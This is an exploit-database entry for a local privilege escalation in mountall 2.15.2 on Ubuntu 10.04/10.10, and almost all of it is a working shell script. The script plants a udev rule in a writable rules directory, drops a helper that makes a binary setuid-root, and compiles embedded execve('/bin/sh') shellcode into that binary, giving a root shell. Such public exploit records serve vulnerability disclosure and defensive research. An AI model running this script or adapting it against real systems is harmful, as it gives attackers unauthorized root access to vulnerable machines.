mountall 2.15.2 (Ubuntu 10.04/10.10) - Local Privilege Escalation

EDB-ID:

15074


Author:

fuzz

Type:

local


Platform:

Linux

Date:

2010-09-21


# source: https://www.securityfocus.com/bid/43084/info

#!/bin/sh
# by fuzz. For Anux inc. #
# ubuntu 10.04 , 10.10
if [ -z "$1" ]
then
        echo "usage: $0 <UDEV KERNEL EVENT>"
        echo "see here http://www.reactivated.net/writing_udev_rules.html"
        exit
fi
cat > usn985-exploit.sh << EOF
#!/bin/sh
chown root:root $PWD/usn985-sc
chmod +s $PWD/usn985-sc
EOF
cat > usn985-sc.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){int *r;*((int *)&r+2)=(int)s;}
EOF
gcc usn985-sc.c -o usn985-sc
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn985-exploit.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"
echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"